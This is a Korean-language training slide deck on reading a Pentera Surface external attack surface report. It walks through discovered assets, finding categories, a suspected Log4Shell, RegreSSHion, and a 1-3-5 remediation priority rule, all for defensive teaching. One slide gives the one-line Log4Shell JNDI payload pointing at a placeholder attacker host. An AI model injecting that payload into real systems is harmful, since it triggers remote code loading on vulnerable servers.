Pentera Surface
리포트 읽기

External Attack Surface · 실제 사례 따라 읽기

Week 03 Pentera Surface EASM

2026.05.18

지난 시간까지

Week 01 — 침투 테스트의 기초
Week 02-1 — Pentera Core 설정/시나리오
Week 02-2 — Core 실행 모듈 / Safety

지금까지는 내부 침투 검증 위주
오늘은 시선을 밖으로 돌려본다

공격자는 우리 도메인 하나만 가지고
어디까지 알아낼 수 있을까?

Surface vs Core

Pentera Core

네트워크 내부에서 침투 검증

Black/Gray/Targeted 시나리오
AD 권한 상승, 측면 이동
랜섬웨어 에뮬레이션

Pentera Surface

외부 공격면 자동 발견·평가

도메인 하나로 자산 그래프 확장
CVE 자동 매칭
EASM 카테고리

오늘은 Surface 리포트 한 장을 펼쳐서
공격자 시선으로 한 줄씩 읽어본다.

도메인 1개 → 자산 370개

113

Subdomains

42

IP Addresses

119

Websites

시드로 입력한 건 도메인 단 1개. Pentera는 자동으로 113개 서브도메인·119개 웹사이트를 발견.
공격자도 같은 일을 한다 — subfinder, amass로 몇 분 안에.

세 가지 개념을 구분하자

A

Attraction

공격자에게 매력적으로 보이는 표면. 실제 취약 여부는 미확정.

예: 만료된 SSL, 노출된 SSH 포트

V

Vulnerability

실제로 확인된 보안 약점. CVE 매핑 가능.

예: RegreSSHion CVE-2024-6387

A

Achievement

Pentera가 실제로 익스플로잇에 성공한 결과.

예: Open Redirect로 외부 리디렉트 성공

Attraction ⊇ Vulnerability ⊇ Achievement

Impacting Findings

카테고리	총 개수	Extreme/Critical	Serious/High	Moderate/Medium	Minimal/Low
Attractions	326	1	61	255	9
Vulnerabilities	83	6	36	27	14
Achievements	96	5	5	7	79

326개 매력적 표면 중 단 1개가 Extreme.
그 1개가 무엇인지가 가장 먼저 봐야 할 질문이다.

Top Actions — Found vs Not Found

Risk	Action	Status
Critical	Log4Shell (CVE-2021-44228)	Not found
Critical	ASP.NET Insecure Deserialization	Not found
Critical	F5 BIG-IP RCE (CVE-2022-1388)	Not found
High	Exploited Open Redirect	Found
High	Remote MySQL connection enabled	Found
Medium	Reflected XSS	Found
Medium	Detect DB Servers	Found

단 1개라도 Found이면 우선순위 큐의 맨 앞이다.
"많이 안 뚫리고 1개만 뚫렸다"는 안심이 아닌 행동의 신호.

🔴 흥미로운 발견 ① — Potential Log4Shell

Extreme 등급 — 326개 중 단 1건

CVE: CVE-2021-44228
자산: xxx.xxx.xxx.xx:9003
상태: 자동 익스플로잇 실패, Log4j 사용 흔적 검출

Top Actions에서는 "Not Found"인데?

Pentera의 자동 익스플로잇 PoC는 실패했지만, 트래픽 패턴이나 응답 헤더에서 Log4j 의심 신호가 잡혔다는 뜻.

→ 수동 검증 1순위

4년 지난 CVE가 아직도 1순위인 이유

공개	`2021-12-09`
CVSS	10.0 (Maximum)
익스플로잇	매우 낮음
Active in Wild	YES
CISA KEV	등재

익스플로잇 한 줄:

${jndi:ldap://attacker/}

"옛날 CVE라 다 패치되었을 것"이라는 가정은 위험.
자동화 봇이 24시간 스캔 중.

🟡 흥미로운 발견 ② — RegreSSHion

CVE-2024-6387 · 점수 8.1 (High)

자산: xxx.xxx.xxx.xx:22
영향: OpenSSH 8.5p1 ~ 9.8p1
결과: 인증 없는 RCE (root)

왜 "Regression"?

2006년에 패치된 OpenSSH 결함이
2020년 리팩토링에서 부활했기 때문.

보안 픽스도 회귀(regression)할 수 있다는 사례.

회귀 CVE의 18년 여정

2006

CVE-2006-5051 발견 및 패치

↓

(시간 흐름, 코드 리팩토링)

2020

리팩토링 과정에서 동일 결함 재도입

↓

(4년간 미발견)

2024

CVE-2024-6387 (RegreSSHion) 재발견

"한 번 고친 CVE는 영원히 고쳐진다"는 가정도 깨진다.
CI/CD에 보안 회귀 테스트가 필요한 이유.

Past Findings — 조치의 증거

점수	과거 발견 항목	현재 상태
9.8	PrestaShop SQL Injection	해결됨
8.3	API secrets exposed	해결됨
5.3	Remote MySQL connection enabled	일부 해결, 타 자산 영향
4.5	Database exposed to the internet	일부 해결, 타 자산 영향
1.9	Enumerated Git repository	해결됨

"Note this vulnerability type is still affecting other assets"
한 자산은 고쳤지만 같은 유형이 다른 자산에 남아있다는 경고. 전형적 패치 누락.

1-3-5 우선순위 원칙

1주

1건의 Extreme

Potential Log4Shell 수동 검증. 진짜면 격리 → 패치 → 재검사.

1개월

3건의 High

신규 CVE (RegreSSHion), 외부 노출 DB, 외부 노출 SSH.

분기

5건의 위생

만료 인증서, 약한 cipher, 서브도메인 인벤토리, 포트 정책, 자산 owner 매핑.

모든 취약점을 한꺼번에 잡으려는 것이 가장 흔한 실패 패턴.
Extreme 1건을 끝까지 추적하는 것이 326건을 동시에 훑는 것보다 가치 있다.

흔한 실수

"CVSS 9.8이 Past로 표시되면 안전" ← Past는 "해당 자산에서 안 보임"일 뿐. 다른 자산에 같은 패턴 있을 수 있음.
"Attraction이 많아도 Vulnerability가 적으면 OK" ← 326개 모두가 정찰의 출발점.
"외부에서 안 보이면 안전" ← Surface는 외부만. 내부 침투는 Core로 별도 검증.
"4년 지난 CVE는 다 패치됨" ← Log4Shell이 아직도 1건씩 잡힌다.

정리

도메인 1개 → 자산 370개 자동 매핑
Attraction / Vulnerability / Achievement 는 모두 다른 개념
Extreme 1건이 Moderate 255건보다 우선
신규 CVE도, 회귀 CVE도 모두 위협
Past Findings의 "타 자산에 여전히 영향" 경고를 놓치지 말 것

개수가 아니라 등급과 익스플로잇 가능성으로 우선순위를 잡는다.

Q & A

감사합니다

Pentera Surface리포트 읽기